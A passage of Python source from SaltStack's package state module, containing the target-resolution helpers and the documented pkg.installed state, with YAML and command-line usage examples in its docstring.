for patch_name in to_download:
cver = cur_patches.get(patch_name, {})
# Advisory patch not yet installed, so add to targets
if not cver:
targets.append(patch_name)
continue
if not targets:
# All specified packages are already downloaded
msg = "All specified advisory patches are already installed"
return {"name": name, "changes": {}, "result": True, "comment": msg}
return targets
def _find_remove_targets(
name=None, version=None, pkgs=None, normalize=True, ignore_epoch=None, **kwargs
):
"""
Inspect the arguments to pkg.removed and discover what packages need to
be removed. Return a dict of packages to remove.
"""
if __grains__["os"] == "FreeBSD":
kwargs["with_origin"] = True
cur_pkgs = __salt__["pkg.list_pkgs"](versions_as_list=True, **kwargs)
if pkgs:
# pylint: disable=not-callable
to_remove = _repack_pkgs(pkgs, normalize=normalize)
# pylint: enable=not-callable
if not to_remove:
# Badly-formatted SLS
return {
"name": name,
"changes": {},
"result": False,
"comment": "Invalidly formatted pkgs parameter. See minion log.",
}
else:
_normalize_name = __salt__.get("pkg.normalize_name", lambda pkgname: pkgname)
to_remove = {_normalize_name(name): version}
version_spec = False
# Find out which packages will be targeted in the call to pkg.remove
# Check current versions against specified versions
targets = []
problems = []
for pkgname, pkgver in to_remove.items():
# FreeBSD pkg supports `openjdk` and `java/openjdk7` package names
origin = bool(re.search("/", pkgname))
if __grains__["os"] == "FreeBSD" and origin:
cver = [k for k, v in cur_pkgs.items() if v["origin"] == pkgname]
else:
cver = cur_pkgs.get(pkgname, [])
# Package not installed, no need to remove
if not cver:
continue
# No version specified and pkg is installed
elif __salt__["pkg_resource.version_clean"](pkgver) is None:
targets.append(pkgname)
continue
version_spec = True
try:
if _fulfills_version_string(cver, pkgver, ignore_epoch=ignore_epoch):
targets.append(pkgname)
else:
log.debug(
"Current version (%s) did not match desired version "
"specification (%s), will not remove",
cver,
pkgver,
)
except CommandExecutionError as exc:
problems.append(exc.strerror)
continue
if problems:
return {
"name": name,
"changes": {},
"result": False,
"comment": " ".join(problems),
}
if not targets:
# All specified packages are already absent
msg = "All specified packages{} are already absent".format(
" (matching specified versions)" if version_spec else ""
)
return {"name": name, "changes": {}, "result": True, "comment": msg}
return targets
def _find_install_targets(
name=None,
version=None,
pkgs=None,
sources=None,
skip_suggestions=False,
pkg_verify=False,
normalize=True,
ignore_epoch=None,
reinstall=False,
refresh=False,
**kwargs
):
"""
Inspect the arguments to pkg.installed and discover what packages need to
be installed. Return a dict of desired packages
"""
was_refreshed = False
if all((pkgs, sources)):
return {
"name": name,
"changes": {},
"result": False,
"comment": 'Only one of "pkgs" and "sources" is permitted.',
}
# dict for packages that fail pkg.verify and their altered files
altered_files = {}
# Get the ignore_types list if any from the pkg_verify argument
if isinstance(pkg_verify, list) and any(
x.get("ignore_types") is not None
for x in pkg_verify
if isinstance(x, _OrderedDict) and "ignore_types" in x
):
ignore_types = next(
x.get("ignore_types") for x in pkg_verify if "ignore_types" in x
)
else:
ignore_types = []
# Get the verify_options list if any from the pkg_verify argument
if isinstance(pkg_verify, list) and any(
x.get("verify_options") is not None
for x in pkg_verify
if isinstance(x, _OrderedDict) and "verify_options" in x
):
verify_options = next(
x.get("verify_options") for x in pkg_verify if "verify_options" in x
)
else:
verify_options = []
if __grains__["os"] == "FreeBSD":
kwargs["with_origin"] = True
if salt.utils.platform.is_windows():
# Windows requires a refresh to establish a pkg db if refresh=True, so
# add it to the kwargs.
kwargs["refresh"] = refresh
resolve_capabilities = (
kwargs.get("resolve_capabilities", False) and "pkg.list_provides" in __salt__
)
try:
cur_pkgs = __salt__["pkg.list_pkgs"](versions_as_list=True, **kwargs)
cur_prov = (
resolve_capabilities and __salt__["pkg.list_provides"](**kwargs) or dict()
)
except CommandExecutionError as exc:
return {"name": name, "changes": {}, "result": False, "comment": exc.strerror}
if salt.utils.platform.is_windows() and kwargs.pop("refresh", False):
# We already refreshed when we called pkg.list_pkgs
was_refreshed = True
refresh = False
if any((pkgs, sources)):
if pkgs:
# pylint: disable=not-callable
desired = _repack_pkgs(pkgs, normalize=normalize)
# pylint: enable=not-callable
elif sources:
desired = __salt__["pkg_resource.pack_sources"](
sources,
normalize=normalize,
)
if not desired:
# Badly-formatted SLS
return {
"name": name,
"changes": {},
"result": False,
"comment": "Invalidly formatted '{}' parameter. See minion log.".format(
"pkgs" if pkgs else "sources"
),
}
to_unpurge = _find_unpurge_targets(desired, **kwargs)
else:
if salt.utils.platform.is_windows():
# pylint: disable=not-callable
pkginfo = _get_package_info(name, saltenv=kwargs["saltenv"])
# pylint: enable=not-callable
if not pkginfo:
return {
"name": name,
"changes": {},
"result": False,
"comment": "Package {} not found in the repository.".format(name),
}
if version is None:
# pylint: disable=not-callable
version = _get_latest_pkg_version(pkginfo)
# pylint: enable=not-callable
if normalize:
_normalize_name = __salt__.get(
"pkg.normalize_name", lambda pkgname: pkgname
)
desired = {_normalize_name(name): version}
else:
desired = {name: version}
to_unpurge = _find_unpurge_targets(desired, **kwargs)
# FreeBSD pkg supports `openjdk` and `java/openjdk7` package names
origin = bool(re.search("/", name))
if __grains__["os"] == "FreeBSD" and origin:
cver = [k for k, v in cur_pkgs.items() if v["origin"] == name]
else:
cver = cur_pkgs.get(name, [])
if name not in to_unpurge:
if version and version in cver and not reinstall and not pkg_verify:
# The package is installed and is the correct version
return {
"name": name,
"changes": {},
"result": True,
"comment": "Version {} of package '{}' is already installed".format(
version, name
),
}
# if cver is not an empty string, the package is already installed
elif cver and version is None and not reinstall and not pkg_verify:
# The package is installed
return {
"name": name,
"changes": {},
"result": True,
"comment": "Package {} is already installed".format(name),
}
version_spec = False
if not sources:
# Check for alternate package names if strict processing is not
# enforced. Takes extra time. Disable for improved performance
if not skip_suggestions:
# Perform platform-specific pre-flight checks
not_installed = {
name: version
for name, version in desired.items()
if not (
name in cur_pkgs
and (
version is None
or _fulfills_version_string(
cur_pkgs[name], version, ignore_epoch=ignore_epoch
)
)
)
}
if not_installed:
try:
problems = _preflight_check(not_installed, **kwargs)
except CommandExecutionError:
pass
else:
comments = []
if problems.get("no_suggest"):
comments.append(
"The following package(s) were not found, and no "
"possible matches were found in the package db: "
"{}".format(", ".join(sorted(problems["no_suggest"])))
)
if problems.get("suggest"):
for pkgname, suggestions in problems["suggest"].items():
comments.append(
"Package '{}' not found (possible matches: {})".format(
pkgname, ", ".join(suggestions)
)
)
if comments:
if len(comments) > 1:
comments.append("")
return {
"name": name,
"changes": {},
"result": False,
"comment": ". ".join(comments).rstrip(),
}
# Resolve the latest package version for any packages with "latest" in the
# package version
wants_latest = [] if sources else [x for x, y in desired.items() if y == "latest"]
if wants_latest:
resolved_latest = __salt__["pkg.latest_version"](
*wants_latest, refresh=refresh, **kwargs
)
if len(wants_latest) == 1:
resolved_latest = {wants_latest[0]: resolved_latest}
if refresh:
was_refreshed = True
refresh = False
# pkg.latest_version returns an empty string when the package is
# up-to-date. So check the currently-installed packages. If found, the
# resolved latest version will be the currently installed one from
# cur_pkgs. If not found, then the package doesn't exist and the
# resolved latest version will be None.
for key in resolved_latest:
if not resolved_latest[key]:
if key in cur_pkgs:
resolved_latest[key] = cur_pkgs[key][-1]
else:
resolved_latest[key] = None
# Update the desired versions with the ones we resolved
desired.update(resolved_latest)
# Find out which packages will be targeted in the call to pkg.install
targets = {}
to_reinstall = {}
problems = []
warnings = []
failed_verify = False
for package_name, version_string in desired.items():
cver = cur_pkgs.get(package_name, [])
if resolve_capabilities and not cver and package_name in cur_prov:
cver = cur_pkgs.get(cur_prov.get(package_name)[0], [])
# Package not yet installed, so add to targets
if not cver:
targets[package_name] = version_string
continue
if sources:
if reinstall:
to_reinstall[package_name] = version_string
continue
elif "lowpkg.bin_pkg_info" not in __salt__:
continue
# Metadata parser is available, cache the file and derive the
# package's name and version
err = "Unable to cache {0}: {1}"
try:
cached_path = __salt__["cp.cache_file"](
version_string, saltenv=kwargs["saltenv"]
)
except CommandExecutionError as exc:
problems.append(err.format(version_string, exc))
continue
if not cached_path:
problems.append(err.format(version_string, "file not found"))
continue
elif not os.path.exists(cached_path):
problems.append("{} does not exist on minion".format(version_string))
continue
source_info = __salt__["lowpkg.bin_pkg_info"](cached_path)
if source_info is None:
warnings.append(
"Failed to parse metadata for {}".format(version_string)
)
continue
else:
verstr = source_info["version"]
else:
verstr = version_string
if reinstall:
to_reinstall[package_name] = version_string
continue
if not __salt__["pkg_resource.check_extra_requirements"](
package_name, version_string
):
targets[package_name] = version_string
continue
# No version specified and pkg is installed
elif __salt__["pkg_resource.version_clean"](version_string) is None:
if (not reinstall) and pkg_verify:
try:
verify_result = __salt__["pkg.verify"](
package_name,
ignore_types=ignore_types,
verify_options=verify_options,
**kwargs
)
except (CommandExecutionError, SaltInvocationError) as exc:
failed_verify = exc.strerror
continue
if verify_result:
to_reinstall[package_name] = version_string
altered_files[package_name] = verify_result
continue
version_fulfilled = False
allow_updates = bool(not sources and kwargs.get("allow_updates"))
try:
version_fulfilled = _fulfills_version_string(
cver, verstr, ignore_epoch=ignore_epoch, allow_updates=allow_updates
)
except CommandExecutionError as exc:
problems.append(exc.strerror)
continue
# Compare desired version against installed version.
version_spec = True
if not version_fulfilled:
if reinstall:
to_reinstall[package_name] = version_string
else:
version_conditions = _parse_version_string(version_string)
if pkg_verify and any(
oper == "==" for oper, version in version_conditions
):
try:
verify_result = __salt__["pkg.verify"](
package_name,
ignore_types=ignore_types,
verify_options=verify_options,
**kwargs
)
except (CommandExecutionError, SaltInvocationError) as exc:
failed_verify = exc.strerror
continue
if verify_result:
to_reinstall[package_name] = version_string
altered_files[package_name] = verify_result
else:
log.debug(
"Current version (%s) did not match desired version "
"specification (%s), adding to installation targets",
cver,
version_string,
)
targets[package_name] = version_string
if failed_verify:
problems.append(failed_verify)
if problems:
return {
"name": name,
"changes": {},
"result": False,
"comment": " ".join(problems),
}
if not any((targets, to_unpurge, to_reinstall)):
# All specified packages are installed
msg = "All specified packages are already installed{0}"
msg = msg.format(
" and are at the desired version" if version_spec and not sources else ""
)
ret = {"name": name, "changes": {}, "result": True, "comment": msg}
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
return (
desired,
targets,
to_unpurge,
to_reinstall,
altered_files,
warnings,
was_refreshed,
)
def _verify_install(desired, new_pkgs, ignore_epoch=None, new_caps=None):
"""
Determine whether or not the installed packages match what was requested in
the SLS file.
"""
_ok = []
failed = []
if not new_caps:
new_caps = dict()
for pkgname, pkgver in desired.items():
# FreeBSD pkg supports `openjdk` and `java/openjdk7` package names.
# Homebrew for Mac OSX does something similar with tap names
# prefixing package names, separated with a slash.
has_origin = "/" in pkgname
if __grains__["os"] == "FreeBSD" and has_origin:
cver = [k for k, v in new_pkgs.items() if v["origin"] == pkgname]
elif __grains__["os"] == "MacOS" and has_origin:
cver = new_pkgs.get(pkgname, new_pkgs.get(pkgname.split("/")[-1]))
elif __grains__["os"] == "OpenBSD":
cver = new_pkgs.get(pkgname.split("%")[0])
elif __grains__["os_family"] == "Debian":
cver = new_pkgs.get(pkgname.split("=")[0])
else:
cver = new_pkgs.get(pkgname)
if not cver and pkgname in new_caps:
cver = new_pkgs.get(new_caps.get(pkgname)[0])
if not cver:
failed.append(pkgname)
continue
elif pkgver == "latest":
_ok.append(pkgname)
continue
elif not __salt__["pkg_resource.version_clean"](pkgver):
_ok.append(pkgname)
continue
elif pkgver.endswith("*") and cver[0].startswith(pkgver[:-1]):
_ok.append(pkgname)
continue
if _fulfills_version_string(cver, pkgver, ignore_epoch=ignore_epoch):
_ok.append(pkgname)
else:
failed.append(pkgname)
return _ok, failed
def _get_desired_pkg(name, desired):
"""
Helper function that retrieves and nicely formats the desired pkg (and
version if specified) so that helpful information can be printed in the
comment for the state.
"""
if not desired[name] or desired[name].startswith(("<", ">", "=")):
oper = ""
else:
oper = "="
return "{}{}{}".format(name, oper, "" if not desired[name] else desired[name])
def _preflight_check(desired, fromrepo, **kwargs):
"""
Perform platform-specific checks on desired packages
"""
if "pkg.check_db" not in __salt__:
return {}
ret = {"suggest": {}, "no_suggest": []}
pkginfo = __salt__["pkg.check_db"](
*list(desired.keys()), fromrepo=fromrepo, **kwargs
)
for pkgname in pkginfo:
if pkginfo[pkgname]["found"] is False:
if pkginfo[pkgname]["suggestions"]:
ret["suggest"][pkgname] = pkginfo[pkgname]["suggestions"]
else:
ret["no_suggest"].append(pkgname)
return ret
def _nested_output(obj):
"""
Serialize obj and format for output
"""
nested.__opts__ = __opts__
ret = nested.output(obj).rstrip()
return ret
def _resolve_capabilities(pkgs, refresh=False, **kwargs):
"""
Resolve capabilities in ``pkgs`` and exchange them with real package
names, when the result is distinct.
This feature can be turned on while setting the paramter
``resolve_capabilities`` to True.
Return the input dictionary with replaced capability names and as
second return value a bool which say if a refresh need to be run.
In case of ``resolve_capabilities`` is False (disabled) or not
supported by the implementation the input is returned unchanged.
"""
if not pkgs or "pkg.resolve_capabilities" not in __salt__:
return pkgs, refresh
ret = __salt__["pkg.resolve_capabilities"](pkgs, refresh=refresh, **kwargs)
return ret, False
def installed(
name,
version=None,
refresh=None,
fromrepo=None,
skip_verify=False,
skip_suggestions=False,
pkgs=None,
sources=None,
allow_updates=False,
pkg_verify=False,
normalize=True,
ignore_epoch=None,
reinstall=False,
update_holds=False,
**kwargs
):
"""
Ensure that the package is installed, and that it is the correct version
(if specified).
.. note::
Any argument which is either a) not explicitly defined for this state,
or b) not a global state argument like ``saltenv``, or
``reload_modules``, will be passed through to the call to
``pkg.install`` to install the package(s). For example, you can include
a ``disablerepo`` argument on platforms that use yum/dnf to disable
that repo:
.. code-block:: yaml
mypkg:
pkg.installed:
- disablerepo: base,updates
To see what is supported, check :ref:`this page <virtual-pkg>` to find
the documentation for your platform's ``pkg`` module, then look at the
documentation for the ``install`` function.
Any argument that is passed through to the ``install`` function, which
is not defined for that function, will be silently ignored.
:param str name:
The name of the package to be installed. This parameter is ignored if
either "pkgs" or "sources" is used. Additionally, please note that this
option can only be used to install packages from a software repository.
To install a package file manually, use the "sources" option detailed
below.
:param str version:
Install a specific version of a package. This option is ignored if
"sources" is used. Currently, this option is supported
for the following pkg providers: :mod:`apt <salt.modules.aptpkg>`,
:mod:`ebuild <salt.modules.ebuild>`,
:mod:`pacman <salt.modules.pacman>`,
:mod:`pkgin <salt.modules.pkgin>`,
:mod:`win_pkg <salt.modules.win_pkg>`,
:mod:`yumpkg <salt.modules.yumpkg>`, and
:mod:`zypper <salt.modules.zypper>`. The version number includes the
release designation where applicable, to allow Salt to target a
specific release of a given version. When in doubt, using the
``pkg.latest_version`` function for an uninstalled package will tell
you the version available.
.. code-block:: bash
# salt myminion pkg.latest_version vim-enhanced
myminion:
2:7.4.160-1.el7
.. important::
As of version 2015.8.7, for distros which use yum/dnf, packages
which have a version with a nonzero epoch (that is, versions which
start with a number followed by a colon like in the
``pkg.latest_version`` output above) must have the epoch included
when specifying the version number. For example:
.. code-block:: yaml
vim-enhanced:
pkg.installed:
- version: 2:7.4.160-1.el7
In version 2015.8.9, an **ignore_epoch** argument has been added to
:py:mod:`pkg.installed <salt.states.pkg.installed>`,
:py:mod:`pkg.removed <salt.states.pkg.removed>`, and
:py:mod:`pkg.purged <salt.states.pkg.purged>` states, which
causes the epoch to be disregarded when the state checks to see if
the desired version was installed.
Also, while this function is not yet implemented for all pkg frontends,
:mod:`pkg.list_repo_pkgs <salt.modules.yumpkg.list_repo_pkgs>` will
show all versions available in the various repositories for a given
package, irrespective of whether or not it is installed.
.. code-block:: bash
# salt myminion pkg.list_repo_pkgs bash
myminion:
----------
bash:
- 4.2.46-21.el7_3
- 4.2.46-20.el7_2
This function was first added for :mod:`pkg.list_repo_pkgs
<salt.modules.yumpkg.list_repo_pkgs>` in 2014.1.0, and was expanded to
:py:func:`Debian/Ubuntu <salt.modules.aptpkg.list_repo_pkgs>` and
:py:func:`Arch Linux <salt.modules.pacman.list_repo_pkgs>`-based
distros in the 2017.7.0 release.
The version strings returned by either of these functions can be used
as version specifiers in pkg states.
You can install a specific version when using the ``pkgs`` argument by
including the version after the package:
.. code-block:: yaml
common_packages:
pkg.installed:
- pkgs:
- unzip
- dos2unix
- salt-minion: 2015.8.5-1.el6
If the version given is the string ``latest``, the latest available
package version will be installed à la ``pkg.latest``.
**WILDCARD VERSIONS**
As of the 2017.7.0 release, this state now supports wildcards in
package versions for SUSE SLES/Leap/Tumbleweed, Debian/Ubuntu,
RHEL/CentOS, Arch Linux, and their derivatives. Using wildcards can be
useful for packages where the release name is built into the version in
some way, such as for RHEL/CentOS which typically has version numbers
like ``1.2.34-5.el7``. An example of the usage for this would be:
.. code-block:: yaml
mypkg:
pkg.installed:
- version: '1.2.34*'
Keep in mind that using wildcard versions will result in a slower state
run since Salt must gather the available versions of the specified
packages and figure out which of them match the specified wildcard
expression.
:param bool refresh:
This parameter controls whether or not the package repo database is
updated prior to installing the requested package(s).
If ``True``, the package database will be refreshed (``apt-get
update`` or equivalent, depending on platform) before installing.
If ``False``, the package database will *not* be refreshed before
installing.
If unset, then Salt treats package database refreshes differently
depending on whether or not a ``pkg`` state has been executed already
during the current Salt run. Once a refresh has been performed in a
``pkg`` state, for the remainder of that Salt run no other refreshes
will be performed for ``pkg`` states which do not explicitly set
``refresh`` to ``True``. This prevents needless additional refreshes
from slowing down the Salt run.
:param str cache_valid_time:
.. versionadded:: 2016.11.0
This parameter sets the value in seconds after which the cache is
marked as invalid, and a cache update is necessary. This overwrites
the ``refresh`` parameter's default behavior.
Example:
.. code-block:: yaml
httpd:
pkg.installed:
- fromrepo: mycustomrepo
- skip_verify: True
- skip_suggestions: True
- version: 2.0.6~ubuntu3
- refresh: True
- cache_valid_time: 300
- allow_updates: True
- hold: False
In this case, a refresh will not take place for 5 minutes since the last
``apt-get update`` was executed on the system.
.. note::
This parameter is available only on Debian based distributions and
has no effect on the rest.
:param str fromrepo:
Specify a repository from which to install
.. note::
Distros which use APT (Debian, Ubuntu, etc.) do not have a concept
of repositories, in the same way as YUM-based distros do. When a
source is added, it is assigned to a given release. Consider the
following source configuration:
.. code-block:: text
deb http://ppa.launchpad.net/saltstack/salt/ubuntu precise main
The packages provided by this source would be made available via
the ``precise`` release, therefore ``fromrepo`` would need to be
set to ``precise`` for Salt to install the package from this
source.
Having multiple sources in the same release may result in the
default install candidate being newer than what is desired. If this
is the case, the desired version must be specified using the
``version`` parameter.
If the ``pkgs`` parameter is being used to install multiple
packages in the same state, then instead of using ``version``,
use the method of version specification described in the **Multiple
Package Installation Options** section below.
Running the shell command ``apt-cache policy pkgname`` on a minion
can help elucidate the APT configuration and aid in properly
configuring states:
.. code-block:: bash
root@saltmaster:~# salt ubuntu01 cmd.run 'apt-cache policy ffmpeg'
ubuntu01:
ffmpeg:
Installed: (none)
Candidate: 7:0.10.11-1~precise1
Version table:
7:0.10.11-1~precise1 0
500 http://ppa.launchpad.net/jon-severinsson/ffmpeg/ubuntu/ precise/main amd64 Packages
4:0.8.10-0ubuntu0.12.04.1 0
500 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 Packages
500 http://security.ubuntu.com/ubuntu/ precise-security/main amd64 Packages
4:0.8.1-0ubuntu1 0
500 http://us.archive.ubuntu.com/ubuntu/ precise/main amd64 Packages
The release is located directly after the source's URL. The actual
release name is the part before the slash, so to install version
**4:0.8.10-0ubuntu0.12.04.1** either ``precise-updates`` or
``precise-security`` could be used for the ``fromrepo`` value.
:param bool skip_verify:
Skip the GPG verification check for the package to be installed
:param bool skip_suggestions:
Force strict package naming. Disables lookup of package alternatives.
.. versionadded:: 2014.1.1
:param bool resolve_capabilities:
Turn on resolving capabilities. This allow one to name "provides" or alias names for packages.
.. versionadded:: 2018.3.0
:param bool allow_updates:
Allow the package to be updated outside Salt's control (e.g. auto
updates on Windows). This means a package on the Minion can have a
newer version than the latest available in the repository without
enforcing a re-installation of the package.
.. versionadded:: 2014.7.0
Example:
.. code-block:: yaml
httpd:
pkg.installed:
- fromrepo: mycustomrepo
- skip_verify: True
- skip_suggestions: True
- version: 2.0.6~ubuntu3
- refresh: True
- allow_updates: True
- hold: False
:param bool pkg_verify:
.. versionadded:: 2014.7.0
For requested packages that are already installed and would not be
targeted for upgrade or downgrade, use pkg.verify to determine if any
of the files installed by the package have been altered. If files have
been altered, the reinstall option of pkg.install is used to force a
reinstall. Types to ignore can be passed to pkg.verify. Additionally,
``verify_options`` can be used to modify further the behavior of
pkg.verify. See examples below. Currently, this option is supported
for the following pkg providers: :mod:`yumpkg <salt.modules.yumpkg>`.
Examples:
.. code-block:: yaml
httpd:
pkg.installed:
- version: 2.2.15-30.el6.centos
- pkg_verify: True
.. code-block:: yaml
mypkgs:
pkg.installed:
- pkgs:
- foo
- bar: 1.2.3-4
- baz
- pkg_verify:
- ignore_types:
- config
- doc
.. code-block:: yaml
mypkgs:
pkg.installed:
- pkgs:
- foo
- bar: 1.2.3-4
- baz
- pkg_verify:
- ignore_types:
- config
- doc
- verify_options:
- nodeps
- nofiledigest
:param list ignore_types:
List of types to ignore when verifying the package
.. versionadded:: 2014.7.0
:param list verify_options:
List of additional options to pass when verifying the package. These
options will be added to the ``rpm -V`` command, prepended with ``--``
(for example, when ``nodeps`` is passed in this option, ``rpm -V`` will
be run with ``--nodeps``).
.. versionadded:: 2016.11.0
:param bool normalize:
Normalize the package name by removing the architecture, if the
architecture of the package is different from the architecture of the
operating system. The ability to disable this behavior is useful for
poorly-created packages which include the architecture as an actual
part of the name, such as kernel modules which match a specific kernel
version.
.. versionadded:: 2014.7.0
Example:
.. code-block:: yaml
gpfs.gplbin-2.6.32-279.31.1.el6.x86_64:
pkg.installed:
- normalize: False
:param bool ignore_epoch:
If this option is not explicitly set, and there is no epoch in the
desired package version, the epoch will be implicitly ignored. Set this
argument to ``True`` to explicitly ignore the epoch, and ``False`` to
strictly enforce it.
.. versionadded:: 2015.8.9
.. versionchanged:: 3001
In prior releases, the default behavior was to strictly enforce
epochs unless this argument was set to ``True``.
|
**MULTIPLE PACKAGE INSTALLATION OPTIONS: (not supported in pkgng)**
:param list pkgs:
A list of packages to install from a software repository. All packages
listed under ``pkgs`` will be installed via a single command.
.. code-block:: yaml
mypkgs:
pkg.installed:
- pkgs:
- foo
- bar
- baz
- hold: True
``NOTE:`` For :mod:`apt <salt.modules.aptpkg>`,
:mod:`ebuild <salt.modules.ebuild>`,
:mod:`pacman <salt.modules.pacman>`,
:mod:`winrepo <salt.modules.win_pkg>`,
:mod:`yumpkg <salt.modules.yumpkg>`, and
:mod:`zypper <salt.modules.zypper>`,
version numbers can be specified
in the ``pkgs`` argument. For example:
.. code-block:: yaml
mypkgs:
pkg.installed:
- pkgs:
- foo
- bar: 1.2.3-4
- baz
Additionally, :mod:`ebuild <salt.modules.ebuild>`, :mod:`pacman
<salt.modules.pacman>`, :mod:`zypper <salt.modules.zypper>`,
:mod:`yum/dnf <salt.modules.yumpkg>`, and :mod:`apt
<salt.modules.aptpkg>` support the ``<``, ``<=``, ``>=``, and ``>``
operators for more control over what versions will be installed. For
example:
.. code-block:: yaml
mypkgs:
pkg.installed:
- pkgs:
- foo
- bar: '>=1.2.3-4'
- baz
``NOTE:`` When using comparison operators, the expression must be enclosed
in quotes to avoid a YAML render error.
With :mod:`ebuild <salt.modules.ebuild>` is also possible to specify a
use flag list and/or if the given packages should be in
package.accept_keywords file and/or the overlay from which you want the
package to be installed. For example:
.. code-block:: yaml
mypkgs:
pkg.installed:
- pkgs:
- foo: '~'
- bar: '~>=1.2:slot::overlay[use,-otheruse]'
- baz
:param list sources:
A list of packages to install, along with the source URI or local path
from which to install each package. In the example below, ``foo``,
``bar``, ``baz``, etc. refer to the name of the package, as it would
appear in the output of the ``pkg.version`` or ``pkg.list_pkgs`` salt
CLI commands.
.. code-block:: yaml
mypkgs:
pkg.installed:
- sources:
- foo: salt://rpms/foo.rpm
- bar: http://somesite.org/bar.rpm
- baz: ftp://someothersite.org/baz.rpm
- qux: /minion/path/to/qux.rpm
**PLATFORM-SPECIFIC ARGUMENTS**
These are specific to each OS. If it does not apply to the execution
module for your OS, it is ignored.
:param bool hold:
Force the package to be held at the current installed version.
Supported on YUM/DNF & APT based systems.
.. versionadded:: 2014.7.0
Supported on Zypper-based systems.
.. versionadded:: 3003
:param bool update_holds:
If ``True``, and this function would update the package version, any
packages which are being held will be temporarily unheld so that they
can be updated. Otherwise, if this function attempts to update a held
package, the held package(s) will be skipped and the state will fail.
By default, this parameter is set to ``False``.
Supported on YUM/DNF & APT based systems.
.. versionadded:: 2016.11.0
Supported on Zypper-based systems.
.. versionadded:: 3003
:param list names:
A list of packages to install from a software repository. Each package
will be installed individually by the package manager.
.. warning::
Unlike ``pkgs``, the ``names`` parameter cannot specify a version.
In addition, it makes a separate call to the package management
frontend to install each package, whereas ``pkgs`` makes just a
single call. It is therefore recommended to use ``pkgs`` instead of
``names`` to install multiple packages, both for the additional
features and the performance improvement that it brings.
:param bool install_recommends:
Whether to install the packages marked as recommended. Default is
``True``. Currently only works with APT-based systems.
.. versionadded:: 2015.5.0
.. code-block:: yaml
httpd:
pkg.installed:
- install_recommends: False
:param bool only_upgrade:
Only upgrade the packages, if they are already installed. Default is
``False``. Currently only works with APT-based systems.
.. versionadded:: 2015.5.0
.. code-block:: yaml
httpd:
pkg.installed:
- only_upgrade: True
.. note::
If this parameter is set to True and the package is not already
installed, the state will fail.
:param bool report_reboot_exit_codes:
If the installer exits with a recognized exit code indicating that
a reboot is required, the module function
*win_system.set_reboot_required_witnessed*
will be called, preserving the knowledge of this event
for the remainder of the current boot session. For the time being,
``3010`` is the only recognized exit code,
but this is subject to future refinement.
The value of this param
defaults to ``True``. This parameter has no effect
on non-Windows systems.
.. versionadded:: 2016.11.0
.. code-block:: yaml
ms vcpp installed:
pkg.installed:
- name: ms-vcpp
- version: 10.0.40219
- report_reboot_exit_codes: False
:return:
A dictionary containing the state of the software installation
:rtype dict:
.. note::
The ``pkg.installed`` state supports the usage of ``reload_modules``.
This functionality allows you to force Salt to reload all modules. In
many cases, Salt is clever enough to transparently reload the modules.
For example, if you install a package, Salt reloads modules because some
other module or state might require the package which was installed.
However, there are some edge cases where this may not be the case, which
is what ``reload_modules`` is meant to resolve.
You should only use ``reload_modules`` if your ``pkg.installed`` does some
sort of installation where if you do not reload the modules future items
in your state which rely on the software being installed will fail. Please
see the :ref:`Reloading Modules <reloading-modules>` documentation for more
information.
.. seealso:: unless and onlyif
If running pkg commands together with :ref:`aggregate <mod-aggregate-state>`
isn't an option, you can use the :ref:`creates <creates-requisite>`,
:ref:`unless <unless-requisite>`, or :ref:`onlyif <onlyif-requisite>`
syntax to skip a full package run. This can be helpful in large environments
with multiple states that include requisites for packages to be installed.
.. code-block:: yaml
# Using creates for a simple single-factor check
install_nginx:
pkg.installed:
- name: nginx
- creates:
- /etc/nginx/nginx.conf
.. code-block:: yaml
# Using file.file_exists for a single-factor check
install_nginx:
pkg.installed:
- name: nginx
- unless:
- fun: file.file_exists
args:
- /etc/nginx/nginx.conf
# Using unless with a shell test
install_nginx:
pkg.installed:
- name: nginx
- unless: test -f /etc/nginx/nginx.conf
.. code-block:: yaml
# Using file.search for a two-factor check
install_nginx:
pkg.installed:
- name: nginx
- unless:
- fun: file.search
args:
- /etc/nginx/nginx.conf
- 'user www-data;'
The above examples use different methods to reasonably ensure
that a package has already been installed. First, with checking for a
file that would be created with the package. Second, by checking for
specific text within a file that would be created or managed by salt.
With these requisists satisfied, creates/unless will return ``True`` and the
``pkg.installed`` state will be skipped.
.. code-block:: bash
# Example of state run without unless used
salt 'saltdev' state.apply nginx
saltdev:
----------
ID: install_nginx
Function: pkg.installed
Name: nginx
Result: True
Comment: All specified packages are already installed
Started: 20:11:56.388331
Duration: 4290.0 ms
Changes:
# Example of state run using unless requisite
salt 'saltdev' state.apply nginx
saltdev:
----------
ID: install_nginx
Function: pkg.installed
Name: nginx
Result: True
Comment: unless condition is true
Started: 20:10:50.659215
Duration: 1530.0 ms
Changes:
The result is a reduction of almost 3 seconds. In larger environments,
small reductions in waiting time can add up.
:ref:`Unless Requisite <unless-requisite>`
"""
if isinstance(pkgs, list) and len(pkgs) == 0:
return {
"name": name,
"changes": {},
"result": True,
"comment": "No packages to install provided",
}
# If just a name (and optionally a version) is passed, just pack them into
# the pkgs argument.
if name and not any((pkgs, sources)):
if version:
pkgs = [{name: version}]
version = None
else:
pkgs = [name]
kwargs["saltenv"] = __env__
refresh = salt.utils.pkg.check_refresh(__opts__, refresh)
# check if capabilities should be checked and modify the requested packages
# accordingly.
if pkgs:
pkgs, refresh = _resolve_capabilities(pkgs, refresh=refresh, **kwargs)
if not isinstance(pkg_verify, list):
pkg_verify = pkg_verify is True
if (pkg_verify or isinstance(pkg_verify, list)) and "pkg.verify" not in __salt__:
return {
"name": name,
"changes": {},
"result": False,
"comment": "pkg.verify not implemented",
}
if not isinstance(version, str) and version is not None:
version = str(version)
kwargs["allow_updates"] = allow_updates
result = _find_install_targets(
name,
version,
pkgs,
sources,
fromrepo=fromrepo,
skip_suggestions=skip_suggestions,
pkg_verify=pkg_verify,
normalize=normalize,
ignore_epoch=ignore_epoch,
reinstall=reinstall,
refresh=refresh,
**kwargs
)
try:
(
desired,
targets,
to_unpurge,
to_reinstall,
altered_files,
warnings,
was_refreshed,
) = result
if was_refreshed:
refresh = False
except ValueError:
# _find_install_targets() found no targets or encountered an error
# check that the hold function is available
if "pkg.hold" in __salt__ and "hold" in kwargs:
try:
action = "pkg.hold" if kwargs["hold"] else "pkg.unhold"
hold_ret = __salt__[action](name=name, pkgs=pkgs, sources=sources)
except (CommandExecutionError, SaltInvocationError) as exc:
return {
"name": name,
"changes": {},
"result": False,
"comment": str(exc),
}
if "result" in hold_ret and not hold_ret["result"]:
return {
"name": name,
"changes": {},
"result": False,
"comment": (
"An error was encountered while "
"holding/unholding package(s): {}".format(hold_ret["comment"])
